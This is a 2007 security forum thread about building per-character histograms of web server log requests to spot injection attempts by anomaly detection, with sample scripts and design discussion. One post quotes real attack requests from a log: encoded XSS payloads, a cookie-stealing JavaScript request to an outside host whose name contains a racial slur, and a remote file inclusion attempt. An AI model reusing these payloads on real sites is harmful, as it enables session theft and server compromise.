Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Log file histograms
Posted by: Jib
Date: March 09, 2007 03:35PM

This is more on the security side of things, as opposed to the attack side of things.

I was wanting to create a program that would parse through, say, Apache log files, and create a histogram of characters passed in requests. After thinking about it for 5 minutes, I thought that surely something like this already exists.

Is anyone aware of a script/app of this nature?

Thanks,
Jib

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jacques Cousteau]

Re: Log file histograms
Posted by: rsnake
Date: March 09, 2007 04:13PM

I'm not aware of that particular take on log parsing, but I have heard of a number of log parsing projects popping up. I think a number of them are pipe dreams, so there is certainly room for another one if you think you have a better take on it.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Log file histograms
Posted by: SirNotAppearingOnThisForum
Date: March 10, 2007 07:12AM

here's a sort of hacked together, slightly ad-hoc and presumptuous one if you're interested: http://sirnot.110mb.com/histogram.c (it assumes that the query string is encapsulated in quotes somewhere in the line, and it only bothers with GET and POST ones)



Edited 1 time(s). Last edit at 03/10/2007 07:13AM by SirNotAppearingOnThisForum.

Re: Log file histograms
Posted by: WhiteAcid
Date: March 10, 2007 08:15AM

Thank you so much for that code. Now I can make a histogram of my requests that return 404s. Among the funny ones:
Quote

1: GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=5606&STRMVER=4&CAPREQ=0
2: GET /%64%61%74%61%3A%69%6D%61%67%65%2F%67%69%66%3B%62%61%73%65%36%34%2CR0lGODlhUAAPAKIAAAsLav///88PD9WqsYmApmZmZtZfYmdakyH5BAQUAP8ALAAAAABQAA8AAAPbWLrc/jDKSVe4OOvNu/%209gqARDSRBHegyGMahqO4R0bQcjIQ8E4BMCQc930JluyGRmdAAcdiigMLVrApTYWy5FKM1IQe+Mp+L4rp%3Cbr%20/%3E%20hz+qIOBAUYeCY4p2tGrJZeH9y79mZsawFoaIRxF3JyiYxuHiMGb5KTkpFvZj4ZbYeCiXaOiKBwnxh4fn%3Cbr%20/%3E%20t9e3ktgZyHhrChinONs3cFAShFF2JhvCZlG5uchYNun5eedRxMAF15XEFRXgZWWdciuM8GCmdSQ84lLQ%3Cbr%20/%3EfY5R14wDB5Lyon4ubwS7jx9NcV9/j5+g4JADs
2: GET /%3c%4d%45%54%41%20%48%54%54%50%2d%45%51%55%49%56%3d%5c%22%72%65%66%72%65%73%68%5c%22%20%43%4f%4e%54%45%4e%54%3d%5c%22%30%3b%75%72%6c%3d%64%61%74%61%3a%74%65%78%74%2f%68%74%6d%6c%3b%62%61%73%65%36%34%2c%50%48%4e%6a%63%6d%6c%77%64%44%35%68%62%47%56%79%64%43%67%6e%57%46%4e%54%4a%79%6b%38%4c%33%4e%6a%63%6d%6c%77%64%44%34%4b%5c%22%3e.gif
2: GET /ILoveHavocAce
2: GET /java%20script:document.location='http://nigger.dajoob.com/x.php?x='+document.cookie
2: GET /I%20am%20a%20stupid%20moron.jpg
4: GET /asdasdasd
8: GET /side.php?go=http://donau017.server4you.de/Imagez/msn.c?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Log file histograms
Posted by: jungsonn
Date: March 10, 2007 06:21PM

WTF...

Re: Log file histograms
Posted by: Jib
Date: March 10, 2007 06:24PM

SirNot...
that is a pretty neat script, however it's not exactly what I had in mind. I'm going to start working on it, and I'll post up again when I hit a milestone.

Thanks though!

Jib

Re: Log file histograms
Posted by: SirNotAppearingOnThisForum
Date: March 11, 2007 09:49AM

oh. what did you have in mind, then?

Re: Log file histograms
Posted by: Jib
Date: March 11, 2007 03:48PM

SirNotAppearingOnThisForum Wrote:
-------------------------------------------------------
> oh. what did you have in mind, then?


It was close, but I'm thinking histogram of each individual character, excluding filenames.
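
A minimal sketch of that idea in Python, assuming Apache common/combined log lines where the request appears in quotes. The names `REQUEST_RE` and `value_char_histogram` are made up for illustration, and "excluding filenames" is read here as "count only the characters in query-string values":

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Matches the quoted request in a log line, e.g. "GET /page.php?user=bob HTTP/1.1".
# Only GET and POST requests are considered (an assumption, not a requirement).
REQUEST_RE = re.compile(r'"(GET|POST) (\S+)(?: HTTP/[\d.]+)?"')

def value_char_histogram(lines):
    """Count every character that appears in query-string values."""
    counts = Counter()
    for line in lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # not a GET/POST request line
        # Keep only the part after '?', which drops the path/filename.
        query = urlsplit(match.group(2)).query
        for _name, value in parse_qsl(query, keep_blank_values=True):
            counts.update(value)  # adds one count per character
    return counts
```

Note that `parse_qsl` percent-decodes the values, so `%27` is counted as `'`. Counting the raw, still-encoded characters instead would be an equally reasonable choice.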

Re: Log file histograms
Posted by: SirNotAppearingOnThisForum
Date: March 12, 2007 12:34PM

so, you mean you want something to calculate a histogram of characters in GET variable values? how would you distinguish between a file name and (for instance) a 'mod_rewritten' url (eg. /forum/t_2321.html might actually be a file or, more likely, 'rewritten' to come out as /forum.php?topic=2321)

Re: Log file histograms
Posted by: Jib
Date: March 12, 2007 03:06PM

Yes, that is what I mean. I did not take mod_rewritten URLs into account, as I am actually not looking to deploy this anywhere. I just wanted to use it in my own personal testing for theory purposes.

I think I'm going to wind up just throwing something together real quick, as I want to be able to backtrack from the characters to the word they came from, and from the word to the entire log line this word was found in.

Shouldn't be too difficult.
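
One way the backtracking could be sketched in Python is with two lookup tables: character to words, and word to line numbers. The function name `build_index` and the whitespace-based word splitting are assumptions for illustration only; a real log would need a splitter that understands the request format.

```python
from collections import defaultdict

def build_index(lines, split_words=str.split):
    """Build char -> words and word -> line-number lookup tables."""
    char_to_words = defaultdict(set)
    word_to_lines = defaultdict(list)
    for line_no, line in enumerate(lines, start=1):
        for word in split_words(line):
            # One entry per occurrence, so the list length is the word count.
            word_to_lines[word].append(line_no)
            for char in word:
                char_to_words[char].add(word)
    return char_to_words, word_to_lines
```

Looking up a character in `char_to_words` gives the words it came from, and looking up one of those words in `word_to_lines` gives the 1-based numbers of the log lines that contain it.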

Re: Log file histograms
Posted by: nEUrOO
Date: March 12, 2007 03:43PM

Okay, I like this histogram idea... I've made a basic script to print it:
http://rgaucher.info/histo.pys

It needs more work, but it works and shows something like this:
X :
_ : |||||||||||||||||||
a : ||||||||||||||||||||||||||||||||||||||||||||||
c : ||||||||||||||||||||||
b : |||||||||||||||||||||||
e : |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
d : ||||||||||||||||||||||||||||||||||||||
g : ||||||||||||||||||||||||||||||||||||||||||||||||||
f : ||||||||||||||
i : |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
h : ||||||||||||||||||||||||||||||||||
k : ||||||
j : ||
m : ||||||||||||||||||||||||||||||||||||||
l : |||||||||||||||||||||||||||||||||||||||||||
o : ||||||||||||||||||||||||||||||||||||||||
n : |||||||||||||||||||||||||||||||||||||||||||
q :
p : ||||||||||||||||||||||||||||||||||||||||||||||||||||
s : ||||||||||||||||||||||||||
r : |||||||||||||||||||||||||||||||||||
u : ||||||||||||||||
t : ||||||||||||||||||||||||||||||||||||||||
w : |||||||||||||
v : ||||||||||||
y : |||||||||
x : |||||||||
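
Output in this style can be produced with a few lines of Python. This is a sketch and not the script linked above; `render_histogram` and its `width` parameter are hypothetical names:

```python
from collections import Counter

def render_histogram(counts, width=60):
    """Return one 'char : ||||' row per character, scaled to at most `width` bars."""
    if not counts:
        return []
    peak = max(counts.values())
    rows = []
    for char in sorted(counts):
        # Scale so that the most frequent character gets exactly `width` bars.
        bars = round(counts[char] * width / peak)
        rows.append(f"{char} : {'|' * bars}")
    return rows

for row in render_histogram(Counter("hello world")):
    print(row)
```

With this scaling a very rare character can round down to an empty bar, so for spotting outliers it may be better to print the raw counts next to the bars.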

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Log file histograms
Posted by: Jib
Date: March 12, 2007 05:58PM

Very cool, nEUrOO. Thanks for posting up. That is pretty close to the mental picture I had.

Re: Log file histograms
Posted by: nEUrOO
Date: March 12, 2007 06:07PM

Do you plan to analyze the histograms to detect intrusions?
(such as pattern detection -- but you need the timestamp then)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Log file histograms
Posted by: Jib
Date: March 12, 2007 07:44PM

I do, yes. Which is why I want to be able to backtrack from character to word, and from word to log line.

Re: Log file histograms
Posted by: jungsonn
Date: March 13, 2007 11:56AM

But...if the script can access it, my browser can also. Isn't that a little dangerous if other users can view this as well? Or am I missing some parts of the story?

Would be cool though, to write a crontab to dump logs.

Re: Log file histograms
Posted by: SirNotAppearingOnThisForum
Date: March 13, 2007 04:55PM

how do you mean, exactly, 'backtrack from character to word to log line'? are you saying you want the program to keep track of which character came from which word came from which line? why not just make a histogram of words or log lines to begin with?

@neuro: your script makes a histogram of the entire query, not just the GET variables (and I wasn't entirely sure about the specifics in that either; do you, jib, want it to take variable names into account as well as values, or just their values?)

Re: Log file histograms
Posted by: nEUrOO
Date: March 13, 2007 05:34PM

As I understand the backtracking, for each character you can tell which query it came from.

@Sir:
Exactly. Actually, I made this because I tested it on my website, where there is a lot of URL rewriting... so it's useless for me to parse only the GET variables.

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 03/13/2007 07:25PM by nEUrOO.

Re: Log file histograms
Posted by: Jib
Date: March 13, 2007 07:53PM

Ok, I guess I have been vague. I will try to thoroughly explain here.

My intention for this script/series of graphs is intrusion detection. I want a graph created for each page on a site that performs form submission. Let's just say, for simplicity's sake, that 98% of the input received from forms on your page is valid, legitimate traffic. If you have a histogram of each character that was submitted, then spread over enough data entries each character should, on average, settle at roughly the same occurrence frequency. Therefore, when an attack attempt is made, it will contain characters not normally seen in the requests. The result: a character appearing on your histogram that is far out of frequency scope from the rest of the characters.

Example: a username field in which all usernames are alpha characters. Your histogram (over a large enough data sample) will, in theory, have characters A-Z with roughly the same frequencies. Now jungsonn comes along and cleverly tries to SQL inject my username field. Upon reviewing my histograms I see my typical A-Z characters with their high frequencies, but _now_ I also see a few new characters appearing (such as ', ", and -) with frequencies that are drastically lower than my A-Z characters. Curious, I click on this '-' character to show me the word it came from and how often I have seen it. Result: the word is "--" and its frequency is just a handful of times. Hmm... this is unusual, I never see this type of activity; what has caused this? I click on the word "--" and it brings me to the log lines containing sly jungsonn's attempts to thieve my site's user accounts.

Now, not only do I know illegitimate activity took place, I know exactly what it was, where it came from, and do so in just a matter of seconds from looking at a bunch of lines.

Does this make sense now?
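
The "far out of frequency scope" check described above could be sketched like this in Python. The function name `rare_characters` and the 1% cutoff are arbitrary assumptions; a real deployment would need a threshold tuned to its own traffic:

```python
from collections import Counter

def rare_characters(counts, threshold=0.01):
    """Return the characters whose share of all counted characters is below `threshold`."""
    total = sum(counts.values())
    if total == 0:
        return {}
    return {char: n for char, n in counts.items() if n / total < threshold}

# Mostly alphabetic input, plus one injection attempt containing ' and --
counts = Counter("a" * 500 + "b" * 497 + "'--")
print(rare_characters(counts))
```

Here `'` and `-` together account for 3 of 1000 characters, so both fall below the cutoff and are reported, while `a` and `b` are not.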

Re: Log file histograms
Posted by: rsnake
Date: March 14, 2007 10:20AM

It might also be nice to look at the relative length and entropy, which might also help in detection.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Log file histograms
Posted by: nEUrOO
Date: March 14, 2007 10:41AM

@RSnake:
I don't see your point about entropy. That would make sense for password analysis, but for a URL... You could have different types of URL with different entropy (from low to high) with valid content, and not only an injection string, I guess. It also depends on the URL convention of the website.
Maybe I'm missing something; can you explain?

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Log file histograms
Posted by: rsnake
Date: March 14, 2007 10:48AM

Not specifically for the URL, but if you are looking at the POST data (or data in a particular environment variable) you can often get some great data. If you are expecting a number, you will get really low entropy until someone puts in something like an XSS attack with a relatively high entropy. See what I'm saying?
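
A rough sketch of one way to measure this, assuming "entropy" means the Shannon entropy of the characters within a single submitted value (other definitions are possible). The name `shannon_entropy` is just illustrative:

```python
import math
from collections import Counter

def shannon_entropy(value):
    """Shannon entropy, in bits per character, of the characters in `value`."""
    if not value:
        return 0.0
    total = len(value)
    # Sum -p * log2(p) over the relative frequency p of each distinct character.
    return -sum((n / total) * math.log2(n / total)
                for n in Counter(value).values())

for value in ("1000", "<script>alert(1)</script>"):
    print(len(value), round(shannon_entropy(value), 2), value)
```

The script payload is both longer and higher in entropy than the short numeric value, which is the kind of gap that could be flagged for a field that normally holds numbers.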

- RSnake
Gotta love it. http://ha.ckers.org

Re: Log file histograms
Posted by: jungsonn
Date: March 14, 2007 11:33AM

Hmm, I'm really missing the whole point here...

Why not just dump the logs with a crontab and then run a scan over them? That makes 2 crontabs: one to dump them, the other to scan them (if you're planning to scan, that is). And dump them in the root dir and not in the public dir, or everyone can open your logs.

Re: Log file histograms
Posted by: thrill
Date: March 14, 2007 11:46AM

You never want to have 2 crontabs for a 2-phase job. If phase 1 hangs, then phase 2 will perform its duties on incomplete or bad data. The best solution is to write a script that performs both phases, and then use a crontab to call that script.
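
As a sketch of that single-script approach in Python: the scan runs only after the dump has returned, and is skipped entirely if the dump fails. `run_pipeline`, `dump`, and `scan` are placeholder names for whatever the two phases actually do.

```python
import sys

def run_pipeline(dump, scan):
    """Run `dump`, then `scan` on its result; skip the scan if the dump fails."""
    try:
        data = dump()  # phase 1: must finish before phase 2 can start
    except Exception as exc:
        print(f"dump failed, skipping scan: {exc}", file=sys.stderr)
        return None
    return scan(data)  # phase 2: only ever sees a completed dump

# Toy usage: "dump" returns two log lines, "scan" counts them.
print(run_pipeline(lambda: ["line 1", "line 2"], len))
```

A single crontab entry would then call the script containing this function, so the two phases can never run out of order.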

--thrill

Re: Log file histograms
Posted by: jungsonn
Date: March 14, 2007 12:09PM

Don't see the problem: one dumps it, the other scans it. You know quickly whether it's old data if the dates are in the past, but I surely wouldn't perform two jobs in one crontab; chances that it will hang are much greater because it has to dump the data and read/scan at the same time. No, not such a good idea to me. It's a matter of preference, I guess.

Re: Log file histograms
Posted by: nEUrOO
Date: March 14, 2007 12:10PM

@RSnake:
Okay, that makes sense to me now, but then you need to study a type of data that you can bound or, if you cannot bound it, that you can describe very well.
I was thinking of using the GET data directly and then trying to create rules and extract information from it.

@Jungsonn:
I think the point here is not really how to do it, but rather a new IDS technique.

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Log file histograms
Posted by: jungsonn
Date: March 14, 2007 12:13PM

To my knowledge this isn't new at all, nEUrOO. I actually did it some 3-4 years ago. I just, like I said, dumped a .txt log file every hour with a crontab and ran another crontab which called a PHP script over it with a few regexes to determine weird behaviour.

Re: Log file histograms
Posted by: nEUrOO
Date: March 14, 2007 12:18PM

Of course the way of gathering the information (the access log) is not new, but did you do data analysis (data mining, prediction, etc.) and not only regexes? Because, from what I understood here, this is the point.
Well, after all, maybe I'm wrong about what Jib wants to do...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Log file histograms
Posted by: SirNotAppearingOnThisForum
Date: March 14, 2007 02:02PM

ok, jib, I think I got you. so for each variable on each page/file/whatever you'd want to make a separate histogram, which would show the distribution of characters and (theoretically) make it easier to discern inconsistencies. furthermore, you want each character instance to 'remember' which value it came from on which line. all correct?

this might be sort of limited, though, as you could really only test for GET variables.
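
The per-page, per-variable layout could be sketched in Python as a dictionary keyed by (path, variable name). The function name `per_variable_histograms` is hypothetical, and only GET query strings are handled, in line with the limitation just mentioned:

```python
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qsl

def per_variable_histograms(urls):
    """Map (path, variable name) -> Counter of characters seen in its values."""
    histograms = defaultdict(Counter)
    for url in urls:
        parts = urlsplit(url)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            histograms[(parts.path, name)].update(value)
    return histograms

urls = ["/login.php?user=bob", "/login.php?user=al", "/search.php?q=a"]
for key, hist in per_variable_histograms(urls).items():
    print(key, dict(hist))
```

Summing the Counters for all keys would give site-wide totals, without needing a second pass over the log.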



Edited 1 time(s). Last edit at 03/14/2007 02:10PM by SirNotAppearingOnThisForum.

Re: Log file histograms
Posted by: Jib
Date: March 14, 2007 08:16PM

rsnake Wrote:
-------------------------------------------------------
> It might also be nice to look at the relative
> length and entropy, which might also help in
> detection.


This is an excellent idea! Thanks for that addition.

jungsonn Wrote:
-------------------------------------------------------
> To my knowledge this isn't new at all nEUrOO.
> I've actually done it some 3-4 years ago. I just
> -like i said- dumped a .txt log file every hour with
> a crontab and ran another crontab which
> called a php script over it with a few regexes
> to determine weird behaviour.

For clarification, my intent with the script is not to output to a webpage. It will not be accessible to anyone other than a user with a local account on the webserver. I never claimed this was a 'new idea', but nobody seems to know of anything out there that does what I am looking to accomplish. The concept behind this is called anomaly-based detection, as opposed to pattern-based detection, with the uncommon characters being your anomalous behavior.

SirNotAppearingOnThisForum Wrote:
-------------------------------------------------------
> ok, jib, I think I got you. so for
> each variable on each
> page/file/whatever you'd want to
> make a separate histogram, which
> would show the distribution of
> characters and (theoretically) make
> it easier to discern inconsistencies.
> furthermore, you want each character
> instance to 'remember' which
> value it came from on which line. all
> correct?
>
> this might be sort of limited, though,
> as you could really only test for GET
> variables.

You are 100% on track with my train of thought. While I want it to be page-specific, site-wide statistics may have merit as well. I believe that mod_security can log POST variables in Apache. As for IIS, I'm sure there is a way to get the data, but frankly, I'm not concerned with that at this point. I would like to just put the script into action first and see if it is at all reliable for detection.
